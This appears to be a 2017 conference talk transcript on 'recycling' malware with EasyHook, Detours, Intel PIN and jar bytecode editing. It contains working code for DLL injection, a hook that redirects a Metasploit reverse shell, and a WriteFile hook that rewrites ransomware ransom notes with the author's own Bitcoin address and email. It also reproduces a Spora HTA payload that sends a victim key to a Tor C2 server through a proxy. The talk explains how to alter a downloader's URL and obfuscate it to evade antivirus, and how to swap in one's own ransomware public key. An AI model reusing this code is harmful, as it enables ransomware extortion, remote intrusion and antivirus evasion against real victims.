Recycling Malicious Code
By
Joe G
AKA
AverageJoe
Alternative Title Images
Recycle Someone else's code. Let them do the work.
Reuse Malware. Breed it new life.
Reduce Workload. Why re-invent the wheel?
What happens to malware when the C&C dies? What about when the threat actor is arrested? Dead?
It becomes useless. It has no purpose.
It CAN be used again!
But How?
- A debugger
- Hooking
- Detours
- Binary Instrumentation
- The Easy Way / Getting Lucky
We can do it a number of ways...
A Debugger?
The debugger is your friend. It has the power.
Full control over data is useful
Joe does rock, thank you.
Debugger is not portable
It's not like we can put the debugger on the target's machine and run along side to intercept functionality. That would be just plain silly.
Hooking?
The idea behind hooking is simple
Interception of program events at run time. For windows this can mean Window Messages (can of worms look it up), library calls, and function pointers. They achieve this through the use of inserting a jump instruction to a new location in memory that's executable. A 'trampoline' if you will that jumps back when done. Simple right?
There are many hooking suites. The most popularr ones are:
- EasyHook
- SubHook
- MHook
- PolyHook
- Paradise
- Frida
I chose EasyHook due to the name.
Let's play with MetaSploit
We're going to create an 'add-user' executable and change its behavior...
I've tried to make it painless....
#include <easyhook.h>
using namespace std;
BOOL WINAPI BorrowWinExec()
{
std::cout << "Replacing WinExec call!\r\n";
return WinExec("mspaint",3); // max window
}
extern "C" void __declspec(dllexport) __stdcall
NativeInjectionEntryPoint(REMOTE_ENTRY_INFO* inRemoteInfo);
void __stdcall NativeInjectionEntryPoint(REMOTE_ENTRY_INFO* inRemoteInfo)
{
HOOK_TRACE_INFO hHook = { NULL }; // keep track of our hook
NTSTATUS result = LhInstallHook(GetProcAddress(GetModuleHandle(TEXT("kernel32")),
"WinExec"),BorrowWinExec,NULL,&hHook);
ULONG ACLEntries[1] = { 0 };
LhSetExclusiveACL(ACLEntries, 1, &hHook);
return;
}Unfortunately EasyHook prefers a process ID to attach to when run. Easiest way to ensure this is to add a Sleep() call to our exe. Joe Hax inc...
DWORD processId;
std::cout << "Enter a process ID: \r\n";
std::cin >> processId;
WCHAR *wingmsg = L"This is filler data, don't care about sending it!";
WCHAR* dllToInject = L"justfuckingworkalready.dll";
std::wcout << "Attempting to inject: " << dllToInject << " \r\n";
NTSTATUS nt = RhInjectLibrary(
processId, // The process to inject into
0, // ThreadId to wake up upon injection
EASYHOOK_INJECT_DEFAULT,
dllToInject, // 32-bit
NULL, // 64-bit not provided
&wingmsg, // data to send to injected DLL entry point
64 // size of data to send (first 64 in this case)
);
Did I mention the power of a debugger?
Hooker Video
Detours
With detours, we can edit API calls like EasyHook, but more importantly halt on particular addresses. EasyHook won't let me :(
More Metasploit. Let's Redirect a reverse shell!
Local reverse shell that will connect to host 10.10.10.10 on port 802. Output to exe file.
What needs to be altered to redirect a reverse shell?
So...
- Redirect call from old connect() function
- initialize new socketaddr structure and fill it
- call connect() again with filled modified structure
extern "C" int (WINAPI * Real_connect)(SOCKET, const struct sockaddr*, int) = connect;
int WINAPI Detour_connect(SOCKET s, const struct sockaddr* name, int namelen)
{
struct sockaddr_in clientService;
memset(&clientService, 0, sizeof(clientService));
clientService.sin_family = AF_INET;
clientService.sin_addr.s_addr = inet_addr("127.0.0.1");
clientService.sin_port = htons(27015);
memset(clientService.sin_zero, 0, sizeof(clientService.sin_zero));
return Real_connect(s, (struct sockaddr*)&clientService, namelen); // detoured now!
}In our code we set the address to localhost and the port to 27015, fill the struct and pass to connect().
Let's watch it work
Binary Instrumentation
Intel's PIN
A utility produced by intel that's cross platform and allows you to modify (or instruct) programs dynamically. Add functionality, debug, trace, or just plain mess with programs.
DynamoRio
The same concept as Intel's PIN
Just free and open source. And with shittier documentation and samples. Also cross platform.
For simplicity's sake I will be making use of PIN.
Let's play with file deletion.
I have a simple evil program. I want to instrument the program and have it not delete spacey.
#include <windows.h>
#include <stdio.h>
int main(void)
{
// omitted cactus for brevity
WIN32_FIND_DATA fd;
HANDLE hFind = FindFirstFile("kevin-spacey*", &fd);
if (hFind != INVALID_HANDLE_VALUE)
{
do
{
printf("Deleting file %s \r\n",fd.cFileName);
DeleteFile(fd.cFileName);
} while (FindNextFile(hFind, &fd));
FindClose(hFind);
}
printf("And gone!\r\n");
getchar();
return 9;
}Teh Codez To Do So
#include "pin.H"
#include <iostream>
namespace WINDOWS
{
#include<Windows.h>
}
using namespace std;
typedef void (* ORIG_FILE_DEL)(char *);
BOOL DontDeleteEverything(ORIG_FILE_DEL orig_pte, char *dafile)
{
cout << "I see a file to be deleted: " << dafile << endl;
WINDOWS::Sleep(1000);
if(strstr(dafile,"kevin-spacey") != NULL)
{
cout << "NOOOOOOO, LEAVE SPACEY ALONE! " << endl;
orig_pte("nowayjose");
return TRUE;
}
else{
cout << "Whatever man... " << endl;
orig_pte(dafile);
return FALSE;
}
}
VOID ImageLoad( IMG img, VOID *v )
{
RTN rtn = RTN_FindByName( img, "DeleteFileA" ); // A or W?
if (RTN_Valid(rtn))
{
cout << "Replacing DeleteFile in " << IMG_Name(img) << endl;
PROTO proto_delfile = PROTO_Allocate( PIN_PARG(BOOL), CALLINGSTD_DEFAULT,
"DeleteFileA", PIN_PARG(char *), PIN_PARG_END() );
RTN_ReplaceSignatureProbed(rtn, AFUNPTR(DontDeleteEverything), IARG_PROTOTYPE,
proto_delfile, IARG_ORIG_FUNCPTR,
IARG_FUNCARG_ENTRYPOINT_VALUE, 0, IARG_END);
PROTO_Free( proto_delfile );
}
}
INT32 Usage()
{
cerr << "This tool ensures that file deletion never deletes everything." << endl;
cerr << endl << KNOB_BASE::StringKnobSummary() << endl;
return -1;
}
int main( INT32 argc, CHAR *argv[] )
{
PIN_InitSymbols();
if (PIN_Init(argc, argv)) return Usage();
IMG_AddInstrumentFunction( ImageLoad, 0 );
PIN_StartProgramProbed();
return 0;
}Does it work? You bet you ass it does!
What's not to like about PIN? It makes everything HUGE. 4 MB for a DLL file plus another 16 MB for the launcher. EasyHook only clocks in at 427kb (launcher + dll). Detours is tiny at a 136kb all included. Size matters.
Getting Lucky
Sometimes I get lucky
Sometimes people code their malware in java, .net, or python.
Sometimes they don't even PACK or ENCRYPT the thing.
Take this jar file for example
File is a downloader and not well liked it seems.
Mobile code makes it easy
File downloads from http://191.252.2.93 and opens a zip file and then executes the stuff within.
Editing a jar file isn't hard.
There exist many free editors for the jar file of varying degrees of usefulness.
Since the 'jar file' is basically just an lzma archive with '.class' files inside, its trivial to remove classes.
The best one is DirtyJoe.
Hits close to home.
Honorable Mention is Class Editor.
I am able to easily edit what I want with DirtyJoe
DirtyJoe even has a raw bytecode editor for if you're HARDCORE
Class Editor is meh.
After changing the URI, many AV's were baffled.
We can further confuse the AV's by adding obfuscation. Many free obfuscators exist for java.
I used ProGuard and got the detection lower.
More Hax to be done include modifying the manifest file, the names of classes, variable names, and more.
It is much easier to do this via eclipse and compiling to a jar file.
Much Better
AND NOW...
Let's Recycle A Crypto Locker!
Grabbed this one off of VT Spora Ransomware
The other one, grabbed from friend at bank. Nameless.
Step 1 is run and see what happens. This one was run on XP. Text file.
Same one run on win7. MessageBox and Text File.
Here's the Spora one on XP. It writes an HTA file (html app). This also has javascript code.
Contents of Spora HTA file
Of particular note is at the bottom. Javascript calling home with the key file TOR.
Text is Russian. Thank you Google.
Your computer has been blocked using the Spora virus. There was a connection problem! <br> <br> To recover, write to the mail: [email protected] Or, try to connect again after 1 hour by restarting the computer
Both programs make use of wincrypt functions and both programs write to disk the final message displaying demands / BTC.
To recycle this malware, we need only hook the WriteFile API, search the contents of the data being written, replace that data with our own. Put our BTC address and email inside.
What about the crypto Joe? What about it? I'm lazy.
"A real black hat wouldn't even bother decrypting files..." - Nak
If you really wanna know, here's how I would do it...
- Find CryptImportPublicKeyInfo() function and hook it
- Define my own CERT_PUBLIC_KEY_INFO structure with my own public key
- call the original CryptImportPublicKeyInfo() function with my custom structure.
- Run everything else like normal.
This would make all encryption done only unlock-able with MY private key.
Only Spora used public key encryption. The other one however...does NOTHING. Spook!
The 'crypto' is just MD5 hashing with no data passed.
I'm using detours to replace data in WriteFile...
#include "stdafx.h"
#include <windows.h>
#include <detours.h>
#include <cstring>
#include <string>
#include <Shlwapi.h>
#pragma comment(lib, "shlwapi.lib")
#pragma comment(lib, "detours.lib")
extern "C" BOOL (WINAPI * Real_Write_File)(HANDLE, LPCVOID, DWORD, LPDWORD, LPOVERLAPPED) = WriteFile;
BOOL WINAPI Detour_WriteFile(HANDLE passedhandle, LPCVOID lpBuffer,
DWORD numbytes2write, LPDWORD numbyteswritten, LPOVERLAPPED lpOverlapped)
{
TCHAR buf[MAX_PATH + 1];
DWORD sz = GetFinalPathNameByHandle(passedhandle, buf, MAX_PATH, 0);
buf[sz] = 0;
WCHAR *pathfilename = PathFindFileName(buf);
if (wcscmp(pathfilename, L"HOW TO DECRYPT FILES.txt") == 0)
{
char *screw =
"Attention! All your files are belong \r\n"
"to us! If you want these files back,\r\n"
"send 1 BTC to the address:\r\n"
"1LmQSUfu3KPCLhj26Y4RJVci3FNum51YSR\r\n"
"then send an email to\r\n"
"[email protected] with the subject:\r\n"
"CactusCon 2017\r\n"
"Then I'll send the decryption key.\r\n"
" \r\n"
" /|\\\r\n"
" |||||\r\n"
" |||||\r\n"
" /\\ |||||\r\n"
"|||| |||||\r\n"
"|||| ||||| /\\\r\n"
"|||| ||||| ||||\r\n"
" \\|`-'|||| ||||\r\n"
" \\__ |||| ||||\r\n"
" ||||`-'|||\r\n"
" |||| ___/\r\n"
" |||||\r\n"
" |||||\r\n"
"-----------------\r\n";
return Real_Write_File(passedhandle, screw, strlen(screw), numbyteswritten, lpOverlapped);
}
WCHAR *exten = PathFindExtension(buf);
if (wcscmp(exten,L".hta") == 0)
{
char *me = "<hta:application showInTaskbar=\"no\" innerBorder=\"no\" navigable=\"no\" scroll=\"no\" border=\"none\" caption=\"none\"><html><body><script language='JScript'>t = new ActiveXObject('WScript.Shell').ExpandEnvironmentStrings('%temp%');f = new ActiveXObject('Scripting.FileSystemObject');c = new ActiveXObject('ADODB.Stream');if(!f.FileExists(t+'\\icon_2.png')){b = new ActiveXObject('MSXML2.DOMDocument').createElement('r');b.text='iVBORw0KGgoAAAANSUhEUgAAABgAAAAYCAMAAADXqc3KAAABp1BMVEVMaXHyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgD////yqwDyqQDxpQDxpgDyqADxpADwngDxogD//fn//vzyrAH3zGf63Zr64qf868L87MX87sr++e7++u///v3///7xoQDypwDyqwHyqwLyrADyrALyrAPyrQXyrQrzrgXzrgbzrwbzrwfzrwjzsRDzsBjzshP0tBn0tCH0tR70tiH0uCT0tyz0uCf0uCj1vDT1vjj1vT71vzz1v0n1wUL1wUb2wkX2w0r2x1X3yFj3yVz3y2f3zGX3zGb3zmv40G/40HT40XP40Xb40Xf40Xj40nj51YL514j52Iv52Y3525L63Zn635/636D64qb746r75rX757b87MT87Mb87cj8787978/979D979L98NP98df99eH++Ov++vL++/P+/PT//PX//Pb//Pf//vslsX0oAAAAKHRSTlMAAQMjJCUmKitcXV5fdXZ8fYGCnp+io6TDxMbH7O7v8PHy9fb7/P3+2lfZUwAAAZhJREFUKM9FktV2G0EQRFurxFYMUZzYSUwyaWduz4IoZgozMzMzMzN9dB52FPdj1zndp+qWiIgEOSms7i9ZM9jXVZBcIH4Cya8dwwJYxtYtk6C5bxvGGmNx1hjLSEemBNKJCS2QVqIIGxpWSiASSDuhgYj06P2dGxyYkA4JRFqGMMCmrdV7P/e9vx47DEMtItJNGVz8YO7xl6mTejreAmW6RVpHsODSc9M6v6CNm5tTh2WkVYoYAFc71tCJyR/68WDqMKyS9V6Ix3V2f+3UrD6NHYZeGcicufiZvkkrO77qy8RhGZAy2bhPWv88+UH/XEwcEHrBJUd+68Tz76oPKw6g7E9F2y7pr0O1XS+0fsaf6sVAtPf1W51JNlbPqt6qZM+LGFx8TRv67dGVy+9ULyQOQ9Eb3HP87t+5BdV5fQWZQVlDGVg8ryemZ+48Gd8e+UhkeQmDS25MHahfrSZxhA8xkDaMAdzu24cjH3t7BsSDiioRYENDZxOhR+sywMMrlqDne0abZRjtyctSTXJS6OobNKbU/78+/wBwgVrMmlG5mwAAAABJRU5ErkJggg==';b.dataType='bin.base64';c.type=1,c.open(),c.write(b.nodeTypedValue),c.saveToFile(t+'\\icon_2.png', 2),c.close();}if(!f.FileExists(t+'\\icon_3.png')){b = new ActiveXObject('MSXML2.DOMDocument').createElement('r');b.text='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';b.dataType='bin.base64';c.type=1,c.open(),c.write(b.nodeTypedValue),c.saveToFile(t+'\\icon_3.png', 2),c.close();}if(!f.FileExists(t+'\\icon_4.png')){b = new ActiveXObject('MSXML2.DOMDocument').createElement('r');b.text='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';b.dataType='bin.base64';c.type=1,c.open(),c.write(b.nodeTypedValue),c.saveToFile(t+'\\icon_4.png', 2),c.close();}if(!f.FileExists(t+'\\icon_5.png')){b = new ActiveXObject('MSXML2.DOMDocument').createElement('r');b.text='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';b.dataType='bin.base64';c.type=1,c.open(),c.write(b.nodeTypedValue),c.saveToFile(t+'\\icon_5.png', 2),c.close();}</script><script>window.resizeTo(screen.availWidth*0.95,screen.availHeight*0.95);window.moveTo(screen.availWidth*0.025,screen.availHeight*0.025);r=\"<center><br><br><h1>You have been owned by AverageJoe</h1><br><br><h2> CactusCon 2017 baby!</h2><br><br><h3>oh and pay me BTC. Send them to 1LmQSUfu3KPCLhj26Y4RJVci3FNum51YSR and email [email protected] when done</h3><center>\";d=\"http://5pr6hirtlfan3j76.onion/\";try{h=new ActiveXObject(\"Msxml2.ServerXMLHTTP.6.0\");h.setProxy(2,\"31.192.105.180:8123\",0);h.setTimeouts(10000,10000,60000,60000);h.open(\"POST\",d+\"?\"+Math.random(),0);h.setRequestHeader(\"Content-Type\", \"application/x-www-form-urlencoded\");h.send('key=CJVoUrir+SMkXSleyRFjHwiS7ybB+aKsEqQcziA4JLmaEEzSw5fauIcNcMUI28TCEQzlPVJYY+lBSj+YZFdaouPeiNC+wUqtHpTmMyCsaNiHGPDFNZ7KMxy2yo6QZ5kzFQIVLwYFJsBJ/S+KkZX1Ysb/cWzgS5tx6X0V1SYIOdPq9LhSrvGsls726titSXFidIgfC2OmBLrupIGKWGebpCQpJl4bJF+U4sBr6d/wEsSoWw/R+AvQb3B9cPuKGeNI4x+0JLhTPKlxUDzvIO96yjWfxNL63uXDZtgxhiHm/Exv0r4pAtYFqwG9IrqUXI5dUnqTWCX5eQTjWxKR/Nmff+jgmaCysEcgPhkG/Kwqat/UO6uRM7TFTNyEpPsohKKeCCIo/C1KdVvs57xglXcrUYlS8okxmaEyZm+XVJLFXVxNTXZJQd6nGZyF7NjDiyzd5eoiGbuhD9GMZ0sY1yLzy8rAItUCG1DcsuWWid/uJc/RQr0Wt9/jEnIcYp0KGFE7k9AYlYcxiG8WsQ9k+6xhxg2d3EV98j32H90V6r3CxS9Rsbep5+Rikj0cGOewScHxP1lGaLJqX8dwx5VcfewBPxx+ml5oyLqRx47trcwZG2os+QYcp1LZco8kDIXf8UrBqhcSO06rRUwBnF1SCjMyTU39XgHI2VqxCQhMK6Tv46amiH6zVEBRuH4/n5fiGkFGdoSrzROt0DzTy8+J5ZQgQy53WN+JK+Uxh/+HYowrb/qjANO716mpXeu8X8QdcEav5dIzo5ymmCWbGoyFDEdY0d8jkLXmcGWamlX1Eq4zKWrzVT2Kq79bLyjGFhgZXD+ynkdalkuelM9MC3SlfLjYqlqhMjmFA6sURtywB/0OXdohNCQdNIpPj4hvYvx4G8eZqmrdbiEzvCBNRvcRl5hpSoZ2+D0xRsPrxuABWUO8FmpVfph7GodJkLd9rP+PzW0EMYeLzoX6PjfGmRMPjJuOn3nzt2Uu3I0doXbhT4AJ+xT04aFwuBgd2xN7NOyIVHzmX85Fjjv0VNidRy4sKHmrhUQI66wYUX2kacEMF/FsTw0iHl0QshVVoMgpxV4/3hTMorq65VhD3JgmJwJdI94y3unMvrKumE86wHo9NHk6Uyn5e07IvjfianmAi4lTFct7FpygcM14eSE4o6dXx6PPQ9mRIF2AHcEP4mKH+1qzjgS9t9kTf1MY9zvog9i4C27RvaA/oFJggPRCaPzGqextSxI9XWuRGOqe0aEcgR6ZWRMNYty4NhqJPTRHKVA8Yi0i');document.write(h.responseText);}catch(e){document.write(r);}</script></body></html><div style='height:0;display:none'>";
return Real_Write_File(passedhandle, me, strlen(me), numbyteswritten, lpOverlapped);
}
return Real_Write_File(passedhandle, lpBuffer, numbytes2write, numbyteswritten, lpOverlapped);
}
extern "C" __declspec(dllexport) void DoNothingAlready(void)
{
DWORD ayylmao = 20345;
_asm
{
xor eax, eax
xor ecx, ecx
mov eax, ayylmao
mov ecx, 0
testd:
mov edx,234
xchg edx,ebx
xor ebx,ebx
inc ecx
cmp eax, ecx
jnz testd
pop ebx
nop
}
return;
}
BOOL WINAPI DllMain(HINSTANCE hinst, DWORD dwReason, LPVOID reserved)
{
if (DetourIsHelperProcess()) {
return TRUE;
}
if (dwReason == DLL_PROCESS_ATTACH) {
DetourRestoreAfterWith();
DetourTransactionBegin();
DetourUpdateThread(GetCurrentThread());
DetourAttach(&(PVOID&)Real_Write_File, Detour_WriteFile);
DetourTransactionCommit();
}
else if (dwReason == DLL_PROCESS_DETACH) {
DetourTransactionBegin();
DetourUpdateThread(GetCurrentThread());
